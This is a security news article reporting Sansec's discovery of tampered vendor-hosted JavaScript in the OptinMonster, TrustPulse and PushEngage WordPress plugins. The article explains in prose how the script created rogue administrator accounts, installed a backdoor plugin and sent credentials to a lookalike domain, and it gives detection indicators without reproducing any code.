Emerging ThreatsMalware & Ransomware

Malicious Code Infiltrates WordPress Plugins, Creates Rogue Admin Accounts

Analyst 207||Source: InfoSecMag
WordPress plugin developer's workspace with code on screen, coffee, and notes on a minimalist wooden desk.

As many as 1.2 million sites pulled malicious code from a trusted vendor's delivery network after attackers tampered with JavaScript used by popular WordPress plugins, Dutch malware researcher Sansec reported on June 13.

OptinMonster, TrustPulse and PushEngage: the immediate victims

Sansec identified the injection in the JavaScript served for OptinMonster, TrustPulse and PushEngage — three plugins published by WordPress vendor Awesome Motive. Because the altered files were delivered from the vendor's own network, any site loading those scripts received the tampered files directly from the source rather than hosting the malicious payload locally.

Sansec said the payload remains dormant until a logged-in administrator loads a page, leaving ordinary visitors untouched for the moment. That design limits immediate visibility of the compromise but allows the attacker to target high-value accounts on individual sites.

Tampered script behavior: rogue admin accounts, a stealth backdoor and credential exfiltration

According to Sansec's analysis, once a logged-in administrator is detected the malicious script creates a new administrator account on the compromised site, installs a self-hiding backdoor plugin to retain access, and then transmits the new credentials to a lookalike of the legitimate chat service tidio.com. Sansec specifically warned site operators to watch for unfamiliar administrator accounts and for traffic to tidio[.]cc as an indicator of compromise.

OptinMonster alone runs on more than one million sites; TrustPulse and PushEngage account for additional installs. Sansec warned that because the attacker effectively gains control of each compromised site, abuse of regular visitors is likely to follow.

Delivery network compromise and uncertain entry points

The malicious code was served through Awesome Motive's delivery network rather than being planted directly on victim servers. Sansec noted three possible entry points for the attackers: Awesome Motive's own servers, its CDN account, or, less likely, the BunnyNet network used behind the scenes. The firm did not identify which of those was definitively exploited.

Sansec's telemetry shows a short, observable window for some of the tampered files: the OptinMonster and TrustPulse code were logged serving malicious content for about half an hour late on June 12 before the altered files disappeared, suggesting the vendor may have detected and removed the changes. The PushEngage script was still serving malware on June 13, per Sansec's report.

Awesome Motive's reach and the potential scale of impact

While only the three plugins above are confirmed compromised, Awesome Motive's portfolio extends much further. Sansec cited additional products with very large install counts: WPForms with more than six million installs, All in One SEO on around three million sites, and MonsterInsights on roughly two million sites. None of those plugins is a confirmed hit in this campaign, but their presence underscores the potential breadth of impact if the underlying delivery infrastructure were abused.

Sansec likened the campaign to the 2024 Polyfill attack, in which a single poisoned upstream file affected thousands of downstream sites — a comparison intended to highlight how a single compromised source can cascade across a large portion of the web.

What this means for technologists, procurement leaders, and end users

  • Technologists and security teams: Sansec urged operators running Awesome Motive plugins to monitor for unfamiliar administrator accounts and for outbound traffic to tidio[.]cc, and to act quickly if either indicator appears.
  • Procurement and platform owners: The incident illustrates how a vendor with a wide install base can increase downstream risk; the vendor's footprint (tens of millions of sites, per Sansec's description) is a relevant factor when assessing supply-chain exposure.
  • End users and site visitors: While ordinary visitors were reportedly untouched "for now," Sansec warned that abuse of regular visitors is likely to follow once an attacker controls a site, making compromised site detection and remediation time-critical.

Sansec's report raises a central unanswered operational question: which specific part of the vendor delivery chain was breached — Awesome Motive's servers, its CDN account, or BunnyNet — and how quickly was the issue contained across the vendor's ecosystem? Infosecurity has reached out to Awesome Motive for comment.

https://www.infosecurity-magazine.com/news/wordpress-plugin-supply-chain/

Emerging ThreatsSupply ChainMalware OperationsJavascript InjectionWordpress Plugin SecurityRogue Admin AccountsAwesome MotiveOptinmonsterTrustpulsePushengage
Related Intelligence

Continue Reading

Server room with rows of blinking equipment, indicating a compromised network setup.

OptinMonster Plugin Compromised in Supply-Chain Attack

A critical security breach has hit the popular OptinMonster plugin, used by over 1.2 million websites, which delivered malicious JavaScript to unsuspecting users via a compromised content distribution network. The attack, detected by ecommerce security firm Sansec, injected harmful code into websites for a brief but perilous window of time.

Analyst 207
Government office interior with computer screen displaying abstract database representation.

ShinyHunters Breach Council of Europe in Oracle PeopleSoft Heist

The Council of Europe has fallen victim to a massive data breach, with hackers claiming to have stolen a whopping 297 GB of sensitive information, including HR records, payslips, and medical data, by exploiting a zero-day flaw in Oracle PeopleSoft. The ShinyHunters extortion group is behind the breach, boasting a haul of 429,000 files from the attack.

Analyst 207
Network management system interface on a laptop screen in a modern office space.

Cisco Patches SD-WAN Flaw Exploited in Zero-Day Attacks

Cisco has patched a high-risk SD-WAN flaw, known as CVE-2026-20262, that was being exploited in zero-day attacks to gain root privileges. The vulnerability allowed attackers to create or overwrite files on affected systems, and Cisco has now released security updates to fix the issue.

Analyst 207
Bustling Adriatic port with cargo yard and trucks, foreground shows blurred computer system.

Anubis Ransomware Targets Adriatic Port, Exposes Maritime Security Gaps

A ransomware attack by the Anubis group on the Adriatic Port Authority exposed significant gaps in maritime security, putting sensitive employee records and critical infrastructure at risk. The breach, which occurred on December 11, 2025, resulted in the loss of around 2% of the authority's data, with some information making its way to the dark web.

Analyst 207